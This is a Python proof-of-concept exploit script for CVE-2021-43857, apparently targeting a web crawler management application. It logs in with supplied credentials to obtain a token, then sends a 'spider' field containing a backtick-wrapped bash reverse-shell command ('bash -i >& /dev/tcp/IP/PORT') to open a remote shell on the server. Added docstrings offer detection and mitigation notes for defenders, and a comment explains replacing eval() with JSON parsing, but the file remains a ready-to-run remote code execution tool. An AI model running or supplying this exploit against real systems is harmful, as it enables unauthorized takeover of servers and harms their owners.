#!/bin/python3
# coding:utf-8
# Author:lowkey0808
import sys
import requests
import argparse
import pyfiglet
# Module-level banner: this runs on import as well as on direct execution.
# First the CVE identifier as ASCII art, then the author's notice, which is
# printed verbatim (it is runtime output, so it stays in Chinese).
_title = pyfiglet.figlet_format('cve-2021-43857')
_notice = '''
免责声明:
脚本仅供学习参考,请勿恶意攻击他人网站,
如违法乱纪,造成一切后果由使用者自行承担
技术无罪,与作者无关
使用脚本默认同意以上说明!
--Author:lowkey0808
'''
print(_title)
print(_notice)
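def main():
    """Run the two-request proof of concept for CVE-2021-43857.

    Command-line options: ``-u`` base URL, ``-U``/``-P`` login credentials,
    ``-r``/``-p`` callback address and port. Every option defaults to the
    empty string (``argument_default=''``); none is validated here.

    Flow, as written below:
      1. POST the credentials to ``/api/user/auth`` and read ``token`` from
         the JSON reply.
      2. POST a ``spider`` value wrapped in backticks to
         ``/api/project/robots/parse`` with that token in ``Authorization``.

    Any exception, including the 2-second timeout on the second request,
    ends the process silently through ``sys.exit()``.

    Notes for defenders (derived from the requests this script sends):
      * The request needs a valid token, so the issue is post-authentication;
        strong non-default credentials and restricting who can reach the
        management interface limit exposure until the fixed release named in
        the CVE advisory is installed.
      * Detection: a login to ``/api/user/auth`` followed by a POST to a
        ``/api/project/<name>/parse`` path whose ``spider`` field contains
        backticks or other shell metacharacters; a User-Agent that switches
        from a browser string to ``python-requests`` between the two calls
        (specific to this script); on the host, the web application process
        spawning a shell that opens an outbound TCP connection.
      * The backtick form of the payload suggests the server places the
        ``spider`` field into a shell command line -- confirm against the
        advisory / patch.
    """
    try:
        parser = argparse.ArgumentParser(description='cve-2021-43857', argument_default='', usage='')
        parser.add_argument('-u', help='url', metavar='')
        parser.add_argument('-U', help='登录用户', metavar='')
        parser.add_argument('-P', help='登录密码', metavar='')
        parser.add_argument('-r', help='反弹shellIP', metavar='')
        parser.add_argument('-p', help='反弹端口', metavar='')
        argv = parser.parse_args()
        url = argv.u
        username = argv.U
        password = argv.P
        ip = argv.r
        port = argv.p
        # Obtain an auth token.
        u1 = url + "/api/user/auth"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
                         "Accept": "application/json, text/plain, */*",
                         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                         "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8",
                         "Origin": "%s" % url, "Connection": "close", "Referer": "%s" % url}
        burp0_json = {"password": "%s" % password, "username": "%s" % username}
        # SECURITY: the response body is controlled by the remote host. The
        # original passed it to eval(), which would run any Python expression
        # the server (or a honeypot / intercepting proxy) chose to return, on
        # the machine running this script. Parse it strictly as JSON instead;
        # a non-JSON body raises and is handled by the except clause below,
        # exactly as an eval() failure was.
        token = requests.post(u1, headers=burp0_headers, json=burp0_json).json()
        token = 'Token ' + token["token"]
        # NOTE(review): this writes a live session credential to stdout, so it
        # ends up in terminal scrollback and any captured logs.
        print(token)
        # Send the crafted "spider" field with the token attached.
        u2 = url + '/api/project/robots/parse'
        burp1_headers = {"User-Agent": "python-requests/2.20.1", "Accept-Encoding": "gzip, deflate", "Accept": "*/*",
                         "Connection": "keep-alive", "Authorization": "%s" % token}
        burp1_json = {"spider": "`/bin/bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'`" % (ip, port)}
        print(burp1_json)
        requests.post(u2, headers=burp1_headers, json=burp1_json, timeout=2)
    except Exception:
        # Deliberately kept as in the original: every failure (bad URL, failed
        # login, missing "token" key, request timeout) exits silently with
        # status 0, so the exit code carries no information about the outcome.
        sys.exit()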
# Invoke main() only when the file is executed as a script; importing the
# module still prints the banner above but sends no requests.
if __name__ == '__main__':
    main()